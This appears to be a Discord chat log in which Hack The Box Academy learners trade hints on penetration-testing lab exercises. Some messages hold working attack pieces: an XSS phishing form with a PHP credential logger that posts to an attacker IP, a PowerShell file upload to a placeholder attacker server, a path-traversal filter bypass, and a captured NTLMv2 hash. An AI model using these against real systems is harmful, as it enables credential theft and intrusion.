#modules

wow

wooow

okay thank u bruh

but how does this work in that way? i'm running malicious script on my machine but it has to be run on the victim's, am i wrong?

and then, following the scenario, i start nc on my machine and wait

read the section

We can download and compile it on a similar kernel of the target system and then transfer it to the target system. Alternatively, if we can compile the code on the target system, then we can do it directly on the target system.

tldr:file transfer OP

OK MSSQL is officially kicking my butt. I have tried turning on xp_cmdshell and OLE. I do not have privs. The module I am working on is attacking common services and attacking sqldatabases

got it, thank u very much ❤️

I have also identified a linked db but cannot connect

check if you can capture hashes

will try that

Can I DM someone about the Advanced XSS and CSRF skill assessment?

script kiddies can show gifs in modules?

https://tenor.com/view/ltg-low-tier-god-yskysn-ltg-thunder-thunder-gif-23523876

thats awesome

@shut quest for the timezone, I don't know if that's what's causing my problem, but I don't know how to check if it's good. So how do I know which timezone to put on the machine? I've downloaded the UK VPN I use to connect to Elastic.

Another question: why would that be my problem? The alert shown in the elastic view is from a specific time, isn't it? What difference would it make to set a different time zone to the flag I have to enter?

i have my notes now. did you follow the instructions in the section

yes

if you did then you should have the correct answer

honestly that's all i can say about it

basically, if you follow the section, you get the answer.

Should I do the path of Penetration Tester to gain foundational knowledge then move to Bug Bounty Hunter if my goal is the Senior Web Penetration Tester

I validated the thing. I feel like I'm losing a few brain cells at times. Thank you for your help 🙂

bug bounty is usually the easier one so it should be the opposite

oh?

but you can try only pentest if you dont wanna hunt bugs n spiders

https://academy.hackthebox.com/module/80/section/848
i'm in the broken auth skill assessment and i'm stuck
this is the question:
Assess the web application and use various techniques to escalate to a privileged user and find a flag in the admin panel. Submit the contents of the flag as your answer.

i figured out what are the hashed that are being used in the cookie but how am i suppose to understand what user i'm suppose to impersonate?

try harder.

am i missing something?

I mean, admin might be a good start

https://tenor.com/view/pudgy-pudgypenguin-yes-excited-lets-go-gif-17616936804887448745

so you think its safe to skip the pentest course if I wanted to focus more on web application type of vulnerabilities and assesments and aim for the CBBH and SWPT?

CBBH and CPTS focus on different things

CPTS has higher focus on activedirectory and post exploitation.
CBBH is more about just finding the bugs

Then there's CWEE that is about crafting your own exploits for bugs

(Which is why it's an advanced cert)

i think you should google it

others' opinion matter as long as it benefits YOU

I mean here is an OK place to ask, CPTS really won't help with web app stuff

in my current career field im not deling with much active directory or root level machines

most is cloud/vm and web app /web security like wordpress and other sites

I just thought CPTS was the foundation and the rest you can expand to

i couldnt find much info tbh I googled.

in general if you dont wanna do pentest but like bug bounty, some CPTS modules can help you

no, doing vuln assessment and full pentest are 2 different things

The exams also have their own page which you can read more about them

i got backup.vhd in password attacks lab - hard i cracked its password but don't really know how to run it or what to do next any hints pls ?

the foundation is what you stack ur stuff on, networking fundamentals overlap over the different paths

its shared foundation

most are but not all

There's a link you can search for in the discord regarding mounting it

got it thank you

np fam

You can mount either in linux or windows, both are fairly trivial

I know if I do both it will renew my CISSP

i donwloaded the file on my linux machine from smb

so maybe thats another thing to think about

I will def for sure start with CBBH

u feel like asking chatgpt could help lol

I mean that doesn't really change my statement

extracted the password for it but don't know how to open it or what to exactly do with it

My brother in christ

I just gave you a hint

It's a .vhd file

Google what that extension generally means

You can also run file backup.vhd

im on youtube i'll do my research and be back

I also told you there's literally a link to an article that can help you

You can follow that article almost exactly 1::1

I have a question about the module Pivoting, Tunneling, and Port Forwarding > Choosing The Dig Site & Starting Our Tunnels > Remote/Reverse Port Forwarding with SSH. The text encourages me to do what it does and actually get a reverse shell on the Windows host. However, I can't figure out how they downloaded the payload onto the Windows machine. It seems like they already had command line access to the Windows machine in order to download the payload. However, if they already have command line access, why set up a new reverse shell using the reverse proxy? I am not sure how to keep following along with this specfic page

that doesn't mean they had command line access already. for example, what if they obtained code execution through a CMS, and you want to open a reverse shell..

I'm curious if the exercise for https://academy.hackthebox.com/module/147/section/1320 is broken. The hint indicates that the user "kira" exists and implies that the password is contained within the password list. I immediately find kira's password on the smb service. With it, I am unable to login to FTP or SSH. When I use the credentials to enumerate SMB, nothing of value is available.
I checked the HTB forum about this exercise. Someone else indicated they were able to SSH as kira with the cracked password.
I'm thinking that something might be wrong with the exercise....

I didn't see a support option on Academy so I came here. I'm not sure who maintains Academy exercises.

has anyone done the advanced xss and csrf skill assessment and got to admin?

the exercise isn't broken, and works fine for me

try reseting the target and trying with the pw again

Okay, thanks for checking.
I already tried a reset once. I can try it again.

by "immediately" btw do you mean it pops the success right away? or were you meaning like within a minute

bc her pw starts with an l/L (l or L)

so if that's not what you got then back to the drawing board

Interesting... thanks for clearing that up 👍

I got the same result using netexec (smb) and msfconsole (smb_login)

so are you saying the password you obtained does start that way?

that didn't clear anything up for me to be able to sanity check you more lmao

done and found some extra creds hopefully thats it

well backup.vhd is the last step

if that's any indication

any hint how i can "obfuscate" the "." ?

%2e does not work

https://academy.hackthebox.com/module/109/section/1038

is it deleting just . or is it removing ../

a popular technique is ....//

that way sanitization removes the first ../ in the middle there, still leaving the second

repeat until root fs

i am in the right directory, i need to read flag.txt

try going backwards to go forward if that makes sense

go back a directory then go forward back and read the file

it flags the .

ah

haven't done this module so can't be more helpful ¯_(ツ)_/¯

do it 😉

https://tenor.com/view/winnie-the-pooh-ariel-donald-duck-dance-gif-24343483

Password Attacks module completed

great ... but tbh one of the easier ones 😄

i mostly enjoyed the hard lab because the back and forth

my fav was AD

Nice work! Password Attacks is one of my favorites.

i mean it took me a couple weeks but now is the real deal i still have active directory, tunneling, and attacking network enterprise

Thank you

Don't forget Attacking common Applications, it has 33 sections

yeah i still haven't covered everything its going to be a long journy i have a friend of mine who spent 10 mounths to get the CPTS

well we'll get there eventually😅

i am @ it for about 1 month

AD is easy if you have a strong IT background/already know what AD is. if you're just learning about it it can be a bit of a hill to climb i'd say.

its my 3rd or 4th month here

thanks for the response! I tried using bloodhound and windpsearch to find the information required but i don't see any results. Am i climbing up a wrong tree here?

would any of you please help m,e to put my "." in the syntax without getting flagged ?

https://academy.hackthebox.com/module/109/section/1038

luckily I was familiar with some of AD stuff from YT walkthroughs but I still gained a lot

everything is explained but not the damn "." HTB can be mean sometimes

url encode does not work

I mean bh will show it but it's a very common attack with creds

i'll see some course on youtube or read some blogs about it because i always liked doing AD rooms but i really didn't know the logic behind it just a script kiddie throwing random impacket commands hoping 4 something 2 happen

there's a whole AD enumeration and attacks module coming up

in the CPTS path

hmm BH didn't show for me though? Thanks for the nudge!

nvm i do it myself

im talking about the intro to active directory how to use and how it works i'll try 2 dive a little deeper in the basics before going into the module itself

I don't think I did this right.

i was able to do most of the ad enum path without doing the intro module ¯_(ツ)_/¯

it also doesn't help you're doing as root

it's also looking for an interface on your machine that doesn't exist, but likely exists on the target machine

it also looks like something is fucky

might need to restart your vm

it's saying "too many open files" which is odd

I just wish I understood exactly what I'm doing. I'm following along with the module but don't fully understand each step

I have no idea what chisel is doing or why I'm using proxychains

does the module show you doing it from the context of your machine?

or from the context of another

:)

but again

you should almost never have to switch to root

it sounds like your proxychains file is messed up

or is still open or something

has anyone completed the Advanced XSS and CSRF skill assessment?

That was probably my fault. The module says that it should say "socks5 127.0.0.1 1080" in the .conf file but mine says socks4, so I just changed it to socks5

did you save and close the file

Yeah

restart your vm; as the proxychains file should be saved ¯_(ツ)_/¯

also run proxychains with sudo; don't switch to root

as root may not have the same proxychains file as your user

(it may not even be in their path at all)

and being honest idek if you need sudo for this but i could be wrong

I needed sudo to edit the krb5.conf file, which I realized after finished all my editing lol

Well I updated from proxychains 3.14 to 4.16 and it didn't do the awful things that it did before

At least it's easier to read the errors now

solved

enough4today

👍

because it's not a direct edge, it's an attack you can carry out || kerberoast ||

Thank you! I’ll try it when the time allows. Guess i still have much to learn 😅😅

I'm at my wits end on Pass the Ticket from Linux. I cannot get this ccache file from the DC01 computer I've connected to back to my attacker box

You don't get the ccache from DC01

Well whichever one I got it from. I have the ccache file

you get the ccache of linux01$

I just can't get it back to my box. I got it from linux01 to the spawned VM, but I have no idea how to get it from here. None of the powershell webservers I've looked up will work without admin

I mean

? Why do you need a powershell server, this is from password attacks yeah?

Yeah. And because the box it has you RDP into is windows

You ssh, not rdp iirc

You should be ssh into a linux host

you can rdp into linux too

The module had me RDP

and set up chisel

Let me double check

I might be thinking of a separate section

I have chisel on the rdp box connected with chisel on my attacker box so I thought that would be the exfil method, but it doesn't seem to work

link ?

https://academy.hackthebox.com/module/147/section/1657

explain the scenario to me. you have your attacker box which is rdp'd into a windows machine, and this windows machine has a ccache file you want to xfer to your attacker box?

Correct. I would just pull it straight from the box it started on, but I can't access it because it's local networked.

That's the first direct question from that section

"Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." this one ?

Yeah, that's the question.

auth wit the file

and then get the flag from DC

Oh, wait, it's the question before that

I can't import the ticket because I can't get it to my box

its on the linux box afaik

^

It indeed is

try this

It is. But the module tells me to get it to my box and then use export KRB5CCNAME= with it on both my box and the linux box

All the required files are on the linux host

python3 -m http.server

Invoke-RestMethod -Uri "http://your-python-server-ip:port/upload" -Method POST -InFile "C:\path\to\your\file"

You don't have to move it to your box

So is the module wrong?

You can do it all from the linux hosy

You can do it from your attack machine

But it's not required

This is what I was trying to get to

I got the environment variable set on the linux box

I can just do it from there?

That's if you want to carry out the attack via your attack box

sounds like the intended way is chisel and you can't get that working. try my python server method or re-read the chisel part

Intended way is just using the linux host

Lemme see if I can get this to work also

Literally the transfer part is in the optional exercises section

So no. Its not the bare minimum intended method.

Oh, I hadn't gotten that far in the questions. Just going down the list of steps in the module

You already have a domain joined linux host

the second last question right ?

Yeah

Remember not all ccache are valid.

important hint

Also not every section is a direct 1::1 step by step

I found the one that let me ls the DC01

none is lol

Each user has their own share on dc01

It let me dc01 julio

So that's julio's hash

Read the question directly

all i can say is ... do not overthink

You're way overcomplicating it so much lmao

That's typical

load up ccache

and use it to read the flag

I mean if he can ls \\dc01\julio then it's a simple step from there

||smb||

I seriously could ls that folder and just decided to go back and do all that other shit when I could've just immediately connected via smbclient

Yep

Well it's been a learning experience I guess

no worry there wil be much more of this lol

The other stuff is purely for practice with transferring to your own system

And executing it from your own machine

The last question [under optional exercises] is the one that has you attempt the whole multi-transfer bit and use julio's ticket to access the C drive

The first question under optional exercises is the one directing you to follow the chisel example

Well transferring it back to my own machine was an abject failure so...

I got an "Message: unsupported method ('Post')" error with this.

http.server doesn't support upload afaik

Ahh

I think it's the python uploadserver thing

Idk I just have a running nginx server that has an upload port/folder

did you rdp from linux > windows ?

Yeah

I have a python uploadserver running now. Just gotta figure out the right syntax for the transfer

/drive ( xfreeredp )

no server needed

or use remmina

Remmina allows copy pasting?

you can have a shared drive , yes

look into options

not on quick connect

or you can open a python ftp server

or or or

file transfer is easy 😉

I'm good with file transfers from linux > linux. Windows I'm not comfortable with

scp works on windows too

time 4 sleep ... ttyl

if the windows host has an ssh server running (or if the linux host has ssh running)

I wish that the modules would give me some clue about what wordlist to use. The module uses rockyou.txt but it doesn't work for this one lol

question about url encoding. specifically command injection when i url encode why do i get 3 diffrent encodings depending on where i encode it? (1 with burp, 1 with url encode/decode website, 1 with with course material)

Finished FIle Upload Attacks finally

generally you're gonna use the mutated wordlist in the password attack module

also save all creds you find in that module

they come back a few times throughout (except the skill assessment)

Anyone still having problems with ffuf killing vm connections?

Breezed through the Injection Attacks Modules for Sr. Web & getting absolutely crushed by the Skill Assessment - 2 days and counting :\

I realized that lol. I had to go back and find old answers

one might be able to say: skill issue (gl though, the modules look like they're no joke)

<@&861185840277487616>

this reads like you just threw it into chatGPT

but yes \n is a special character to represent new-line (similar to \r which is the carriage return)

Keep the channels on topic, thanks.

i'm just stating how I read it lol

sounds very roboty

that's all

(not saying it's a bad thing)

I also just solved this skill assessment, wasted a couple of hours using the wrong exploit method at first, got a hint from the history message

Maybe you were doing a different one? This one was a Hardware Shop

Im stuck on Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the two IP addresses of the C2 callback server. Answer format: 10.0.0.1XX and 10.0.0.XX on Module UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK Section Intrusion Detection With Splunk (Real-world Scenario)

Injection Attacks Modules skill assessment

Stand corrected 😂

Just put it here, I got a hint from these historical messages
#modules message

@cedar granite i can't click it - I feel less of a human when I find hints bc they divulge too much sometimes and then I feel like I didn't really solve it. Have to struggle 😉 going to reread all the material and try everything lol

Hey I'm stuck on enumerating with nmap nmap scripting engine. It's asking us to scan the target with a script obviously to find the flag which I've done and a flag was shown to me on my first scan however this is the incorrect answer apparently

make sure there are no whitespaces when submitting.

Turns out I was completely wrong and using the wrong port but I figured it out

I need some clarification on SQL injection fundamentals.

Question in Question:
In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?

Can someone explain to me why the answer to this question is the answer that it is? I already have the answer but it makes no sense.

SQL operators section

so; you're basically getting the count where the employee (ID) number is > 10000 or title isn't 'engineer'; since it's an or statement it's processed in order. the > 10000 is processed first, if it's true then it doesn't check the second statement. if the first statement is false then it looks for the job title in which it would be not "engineer"

so basically you can think of it as querying 2 separate objects

you're querying for > 10000 and not engineer then combining the two - the query with the OR statement doesn't include duplicate values

and it's an in-order operation

meaning it will run check A before check B in the case of A OR B

if A passes it does not check B

so you can have an engineer with ID > 10000 because it's an A OR B, not A AND B

So what is the purpose of running that command when you can just SELECT * from table and the count will still be the same ??

it won't be

because you can have a not engineer be < 10000

if A returns false, check B

if both return false, return no count

First of all, In DBMS records means rows .
And using OR operator; takes two statements, and return true when at least one of them evaluates as true
So with this knowledge;
You’re querying all the records in the titles table but the WHERE clause would only return employee numbers > 10000 OR that title won’t contain ‘engineer’ field.

^

Oh actually you guys both answered it

so you're looking for all records in the DB where A OR B is true

because all records are over 10000 so checking for b will not yeild

you mean all values in the column "employee number" are >10000?

you're not checking the record amount

you're literally checking the employee ID # that's assigned in that column

^ Pretty much.
Just keep this logic at the back of your mind.

I.E. the first person employed would likely be employee #<leading0s>1

employee # in this question isn't referring to the records in the database

Yea, everything you guys are saying is making perfect sense, but the way the exercise is set up is confusing, should I send screenshots?

Exactly that’s why I initially stated that records = rows

Sure

with DBMS you're asking where columnA.value [operator] condition OR columbB.value [operator] condition and returning a value when A or B is true

in this case the value that would be returned would be an incremental count

this sort of query is used in real life to manage and view employee records

Check it out, I can get the same answer by just running the simple sql SELECT * FROM table; command as I would running the command @fathom pendant is stating that consists of the OR parameter

youre looking for this

I know check it out

Thats what SELECT * FROM **** ; yeilds

but I also get the same answer when I run SELECT * FROM table WHERE a > # OR a != "title";

obviously configured accordingly

do me a favor

run a count of all the records; then do a count with just the > 10000 query

you're likely seeing a truncated version of the table

I understand the material and everything you guys are saying I just don't get why they would set up the exercise like this.

Okay @fathom pendant one sec

If i'm remembering correctly the not "engineer" query only excludes specifically engineer not senior engineer no?

it's been a hot minute since i messed with SQL

Yes senior engineer still yields... heres what I got with with your request

Here's all the records

hm then it's likely the lab was set up weirdly

¯_(ツ)_/¯

and then here is your > 10000 query

tbh the more records the longer it would take to run a query

I didn't mean to send the screen shot without the spoiler warning

so if it truly was a >10k table it would take several minutes to query, likely

Yeah, I'm not entirely sure what was to be taken away from that exercise considering the answer is there by default

but i believe the excersize is more to just get you used to doing different operators

rather than focusing on the pure content

Gotcha

That makes sense, I just wanted to make sure I wasn't overlooking something. I will say though I did not know that if one condition was met then the other one was disregarded after what you had told me, so I learned something either way🤷‍♂️

yeah it does but because of the OR Operator it pretty much means SELECT * FROM titles;

yes it was set up that way lol

if you got the correct answer then it's not something to really think about

perhaps an erratum is needed if something is wrong

In terms of future case scenarios I just wanted to verify I understood the material properly

ye

I believe it's more of a case of showcasing how OR works

as in even if B would be false, A is true so it doesn't matter

^

which IMO is a dumb way to showcase it

BUT it's something set up to be always true

tbh I even thought the record emp_no started from 1.

yeah imo it would be better to have some random ones thrown in there that are < 10k and not engineer

like 6969 | Senior Engineer or something

https://tenor.com/view/thats-a-big-number-scott-forrester-fbi-international-thats-a-huge-amount-thats-a-big-amount-gif-25960938

So reading through some of these previous messages, I'm on SSTI Example 1 looking to install tplmap and I'm trying to do so on kali getting errors with python2 pip installs and errors with collection methods and yaml things a whole mess. As anyone recently been able to install it properly? I can get it own pwnbox but I'd like to do so from my VM. Not really sure what kali's issue is here.

Skill Assestment - Injection Attacks (Senior Web Pentester Path)
For those who completed this, was ||XCAT|| useful or was ||burp|| more useful? I can get ||LFI|| but can't seem to figure out the ||XPATH injection.||

burp

In Window Privilege Escalation - Skill Assessment I I found ldapadmin account password using Lazagne. Is there another way to find it?

Update for any others

python2 -m pip install virtualenv
virtualenv -p /usr/bin/python2 venv
source venv/bin/activate

Make it work.
Not a python genius so this took me too long to figure out

Hello, within ADCS Attacks in the ESC1 section I have having problems in the 'Use TGT to connect to the DC' step. When I run the command it specifies it does not seem to work and just errors every time. I have tried adding '10.129.123.1 LAB-DC.LAB.LOCAL' to the /etc/hosts of my machine as well as trying to add '10.129.123.1 lab.local' to my /etc/hosts to see if that might be the issue, to no success. I'm a bit stumped here and unsure what to do next or how to get it to work

add the domain name too

What do you mean

when dealing with kerberos, always add 3 things to /etc/hosts for dc's ip: hostname, domain name and fqdn

Wooow I can't believe it was that simple, thank you so much for clarifying that. I feel quite dumb not realizing it, certainly going in the notes

In the command injections module specifically the identify filter section the question asks:

Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?

None of them are working so I'm wondering if I'm doing something wrong here. I know what the answer is supposed to be, but all three of these operators are getting blocked for me.

Edit: never mind was a layer 8 issue

Hello guys,

skill assessment: SIEM Module (CDSA)

I've done all the other labs within the module but when iam solving the last assessment iam very confused and failing to understand when to "escalate" and "consult to it", can anyone please help me.

Thanks in advance.

this sense is something you develop over time. There are a few things that are "ok this is a attack, no way that happens on accident" like 1.000 login attempts within a minute or someone trying to access a long deactivated account or honeypot. There you can escalate directly. Then theres cases where you know something shouldn't be happening, but you also know they still are because people aren't following protocol (like in the assessment it mentions admins like to rdp into the dc from their own computers, even though they shouldn't anymore). There you may not have to escalate directly, but you can talk to them first

often there is no 100% right answer, so dw too much about this

Got it.Are there any lab solutions for it , i want to know the exact reason for the correct answers.

I doubt anything official exists for this

if it's a tier 1 or 2 module then no

there will be no official guide/solution workflow for it

hi guys

does anyone got issue with the Skills Assessment - File Upload Attacks?
i've intercepted the only uploadable path with a png image and got nothing on burp, no data at all
i've read the source code of /contact, /contact/script.js, /contact/upload.php, /contact/submit.php
nothing of interest except for regex etc.. is the lab broken or am i just dump, i've restarted both ip and machine env multiple times
tried to manipulate blindly the http request by adding headers and modifying the http form as well, content-type, mime etc.. but nothing would work

• when going to http://IP:PORT/contact/upload.php i right away got the Thank you for submitting your feedback message...
  the weirdest thing is that since the GET url work with no data parsed in it, i can named the file njdlw.lwcljsbvclkv and it'll still work obviously

anybody can help on password attacks - protected files
i cant seem to convert to ssh.hashes it gives an error
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

Use python2

Some of the 2john tools were written for python 2.7

i guess i need to install python 2 :c

yep it worked thanks

Np

It's a common thing

completed 32/33 from "Attacking Common Applications" module - I just cannot get the last SQLi part to work on "Exploiting Web Vulnerabilities in Thick-Client Applications" why am I editing java in notepad on a laggy windows vm that disconnects every 3 mins? - anyone able to help me out?

you can transfer the file to your own vm and use a proper code editor

Module: Into to Assembly Language
Section: Skills Assessment
I need some help on the first task, I’ve edited the assembly code and xor d with rbx but not sure if it’s correct and how to use that to get the answer. Can someone help me please?

#modules message

script vuln works too. /xxxx is shows at the end aswell so i just visited on the browser

Anyone else having problems getting into windows virtual machines right now?

Hi, I don't understand why it has to be shellcode to get it run, can I just run it using ./assembler.sh loaded_shellcode.s?

the instruction is to

Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode

I got some null bytes when use call , how do I get rid of those null bytes? b0: e8 07 00 00 00 call 0xbc
b5: e8 0d 00 00 00 call 0xc7

did anyone do the borken autthentication skill assessment and can help me out?

im pretty sure im doing everything right and still not getting the flag

I'm not sure what you're doing, there's no need to use call, just xor the values

can I DM you? still can't figure out how to get rid of those null bytes

you can send a screenshot of your gdb or what you're trying to do, there shouldn't be any null bytes anywhere

read and follow #welcome so that you can post screenshots

I will get back to you tomorrow, too tired now, thank you for your help

This is making it hard to do brute force password attacks in a module teaching password attacks lol

i have problem with XSS session hijacking,
[Thu Mar 7 08:31:47 2024] PHP 8.2.10 Development Server (http://0.0.0.0:8000) started
[Thu Mar 7 08:32:13 2024] 10.129.165.108:46512 Accepted
[Thu Mar 7 08:32:13 2024] 10.129.165.108:46512 [200]: GET /script.js
[Thu Mar 7 08:32:13 2024] 10.129.165.108:46512 Closing
[Thu Mar 7 08:32:14 2024] 10.129.165.108:46514 Accepted
[Thu Mar 7 08:32:14 2024] 10.129.165.108:46514 Closed without sending a request; it was probably just an unused speculative preconnection
[Thu Mar 7 08:32:14 2024] 10.129.165.108:46514 Closing

Hello guys, I do have a question regarding Network enumeration with Nmap module on HTB Academy. There it states the following

The Connect scan is useful because it is the most accurate way to determine the state of a port, and it is also the most stealthy. Unlike other types of scans, such as the SYN scan, the Connect scan does not leave any unfinished connections or unsent packets on the target host, which makes it less likely to be detected by intrusion detection systems (IDS) or intrusion prevention systems (IPS).

And I am kind of confused with that statement , isn't the Connect scan actually considered unstealthy ? Because by that you perform 3 way handshake and that makes it noisy as if someone lets say the administrator goes to the windows event viewer, it could see us very well, whereas if you perform the scan without performing 3way handshake the event never goes to the event viewer, or am I in wrong with that understanding ?

What would your guys suggestions be for someone just starting out. Which 5 modules should I do first?

I'd go through the fundamentals for understanding the website and how modules work, then once you've done that consider the pre-requisites for a job role path you're interested in perhaps

Also, would be great if anyone could help me out. I have powerview on the virtual machine but when I put in the command prompted it says that the term is not recognised, do I need the ps1 mentioned in the command? [Windows Attack & Defense]

have you imported it?

Just realised, thanks though

Academy down?

i think so

its not working for me too

i haven't had issues so far, but i'm in the US. there's a banner up on my screen though " Scheduled Maintenance on EU Academy 2 VPN today EU Academy 2 will be unavailable 13:00-16:00 UTC.Please utilize other VPN servers during this time. "

are you on that EU 2 vpn?

yep that is the issue

try another vpn server

website is down

website up for me

i'm able to load my dashboard without issue

and now i can't lol

oh wait it did load just took a second

nope not loading for me

its fine i will do some box until it is back up

Wow man, unethical.

if you're good enough to hack american tech giants you should probably just go get a regular job and make way more than offering your services on discord my guy

😂

Same here!

And all from your mommy's basement!

Would like to bump that

What is going to be the next HTB module to come out? Is it posted anywhere?

i wish its tier 2 or less 😥

IDS and IPS systems can view unfinished connections more suspect (varies on rules), it's true

Thank you, appreciate that clarification

Unfinished connections often represent incomplete handshakes in network communication. For example, if a TCP handshake is initiated but not completed, it could indicate an attempt to establish unauthorized connections or reconnaissance activity by an attacker.

checkout pathways

i think there is something for starting

Many thanks because this was driving me crazy 😅

anyways website is down so you cant check rn 😅

its not down though

Hey guys i still need help with the broken authentication skill assessment would love some help
https://academy.hackthebox.com/module/80/section/848
ive cracked the cookie + identified some users and when i filtered rockyou.txt by the password rules it came back with only two passwords witch did not work on any of the accounts im stuck and have on idea how to progress from here
please help🥲

hey, just completed nmap Hard lab from the Firewall IDS/IPS module, but got a question based on it since i even read the manual from a tool used. if someone would ping me so i can dm, much appreciated

you're basically acting as if the scan is coming from a trusted source (DNS) querying for info; a SYN scan also doesn't fully connect which allows filtered ports to be seen

oh yea no i mean i understand that
ill put my screenshot, if it containts too much info ill delete it
i dont understand why it fails first time but second time works

source port

and -p are the same thing

it contains a spoiler because ncat shows the port in which you're connecting to

also: sometimes it can just be dumb

and the initial connection can timeout

deleted sorry.

that's just sometimes how ports respond

im pretty sure i hammered that port like 2 hours ago. and nothing came out..... ffs

also if a port is configured in a certain way; it can temporarily close if too many requests hit it at once

ic

iirc the lab is designed that if you generate too much noise on it you get temp-banned

so you gotta wait that timer out (or restart it)

it could be that you just incidentally have just waited the timer out

yea easy lab was with the status warning after 100 attempts or smthing

the others didnt show

yes each lab has the status page

iirc each lab had port 80 open to see it

efvefn status.php doesnt work

thats from the hard one

http, not https

port 443 isn't open for https

i hate that...

yea i guess it automaticly thew me to 443

and i didnt check that thats me being stupid ....

yeah that's a setting you might wanna disable in firefox

yea its a fresh install on parrot. on linux i have that

tytyty makes sense now. would prob be done with it waaay earlier and wouldnt had to check some tips to get to the end

👍

i got through all the labs without once triggering it

but i heard it's like several minutes, which sounds like suck

yea it def would have made it easier without triggering it / knowing when it was triggered.
i did medium without any trigger and easy i triggered it once to see what happends and at least for easy its like 3min ban

so it's very likely you did an oops while trying to figure out how to be sneaky

question about cpts, are these HARD modules easier then cpts? working towards it

i mean from what I know, the CPTS exam is challenging

but is doable if you just KISS

[Keep It Simple Stupid]

a lot of people have said some of their hurdles were just thinking dumber

yea right! yea sometimes you just need to step back and the flag is easier as you think.

"no way it's [user has sudo perms and can privesc without care]"

no way something like that would exist

rather not test it and keep going down the rabbit hole

step 0 enumerate

it's something i tell people when something basic they're goofing up in a module

and it's clear they missed something in their enum phase

Yea btw you havent done cpts? You planning to?

eventually

life events happened and i haven't been in a place to finish the course

anyone can give me hint on XSS final assessment? i cant get the cookie

have already changed 3 servers

Understandable.
Said to,my self oscp was too pricey and in the meantime when im moving countries and looking for a job i should get my cert.

hi, any suggestions for some reporting tool for windows or mac please? 🙏🏻😬

Simple Markdown is cool. Usually you can convert markdown into other file formats when you need to

Password Attacks Lab - Medium

so iwas able to get the zip file from the smb and cracked it, and also cracked the docx inside so. got j**** creds and now i got d**** creds and now logged in as dennis so from here i presume i need to escalate to root any tips?

obsidian

just look for whatever d has access to

reuse of creds also goes wild

i dont really get it can you elaborate more?

nope

i'll refer to my earlier comment

Enumerate

just look around

got it now i was looking at the answer for a long time and ignoring it

ffffffffff

👍

literally how I figured it out

kinda like a "wait...why is... ffs"

DA will have rights over the whole domain

looking at how tiny the scroll bar is for the code analysis section in malware analysis

me when i see my uni course has a 50 section chapter

https://tenor.com/view/chuckles-im-in-danger-ralph-wiggum-the-simpsons-gif-14149962

between this and uni.. i'd rather take this

uni got me reading 100 page chapters

Would anyone be able to provide some guidance?
Module: HTTPS/TLS Attacks
Chapter: POODLE & BEAST

Hi I am in XSS injection module,
why am I facing this error

well it looks like you don't have a username defined

in your php login

I need tot capture the username so why will I define it?

it means that you didn't define a variable for username

used the same one as in the example

¯_(ツ)_/¯

well, looks like it's pulling from creds.txt

I am in the Attacking Common Services Module on SQL.

||I captured a hash. and cracked it. I tried to authenticate as mssqlsvc using mssqlclient.py. I cant go in that way. Tried to pass the hash too using the same. tried sqsh still nothing. I just need to find a way to get privs to enum the FlagDB. ||What am I missing?

I used touch to create a file

here are the commands I used:

||mssqlclient.py -p 1433 mssqlsvc@10.129.180.219

mssqlclient.py mssqlsvc@10.129.180.219 -hashes :2648801DD5C4392C6D58CC7E317BC0CF||

I guess there is a problem with the payload maybe?
'> <h3>Please login to continue</h3><form action=http://10.10.16.109><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>'); document.getElementById('urlform').remove(); <!----

well look at the error, the error seems to be coming from index.php

says error on line 2

you're missing a )

referring to line 4? also it looks like an extra "

i don't see where the paired " is

line 4 is good

it's line 2 that's the issue

this?

ah nah i'm wrong

ah missed that

yep

<?php
if (isset($_GET[username]) && isset($_GET[password])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET[username]} | Password: {$_GET[password]}");
    header("Location: http://10.129.131.194/phishing/index.php");
    fclose($file);
    exit();
}
?>

its still an error

that's not the right hash, no idea where you got that from

and how did you capture a ntlm v1 hash?

put single quotes around username and password

responder and dirtree lemme give you the full output

if (isset($_GET['username']) && isset($_GET['password']))

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}");
    header("Location: http://10.129.131.194/phishing/index.php");
    fclose($file);
    exit();
}
?>

||[SMB] NTLMv2-SSP Client : 10.129.180.219
[SMB] NTLMv2-SSP Username : WIN-02\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::WIN-02:6cf2a177ccc483a1:2648801DD5C4392C6D58CC7E317BC0CF:010100000000000080952600AE70DA01E601097B1068557700000000020008003200430037005A0001001E00570049004E002D0036004D0033004C00520037004200410045003300500004003400570049004E002D0036004D0033004C0052003700420041004500330050002E003200430037005A002E004C004F00430041004C00030014003200430037005A002E004C004F00430041004C00050014003200430037005A002E004C004F00430041004C000700080080952600AE70DA0106000400020000000800300030000000000000000000000000300000B1DCF34F80DA9395F94A0A3D292850F4299D0BA7E6C9469FB2BF2A210AA5C5150A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390034000000000000000000||

above

i put your code into chatgpt and asked why it didn't work, it spit out calculac0re's script

clearly there's an error in the php code

yep its working now

that's not how you use a ntlmv2 hash, you can't just take out a portion and use it to pth, ntlmv2 is only good for cracking or relaying

Thanks

we love quotes

So, I would provide the full hash including user:domain? I tried that initially but i got " too many values to unpack (expected 2)

you can't pth with ntlmv2, crack it

Thanks. that is good to know.

already did with john.

tried authenticating with that pass with mssqlclient.py and sqsh. No dice, but I wasnt able to with sqsh anyway for the htbdbuser, had to use mssqlclient

"No dice" doesn't mean anything, what's the error?

Thanks for the continued help. Here is what I have consistently got:

||mssqlclient.py mssqlsvc@10.129.180.219
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'mssqlsvc'.

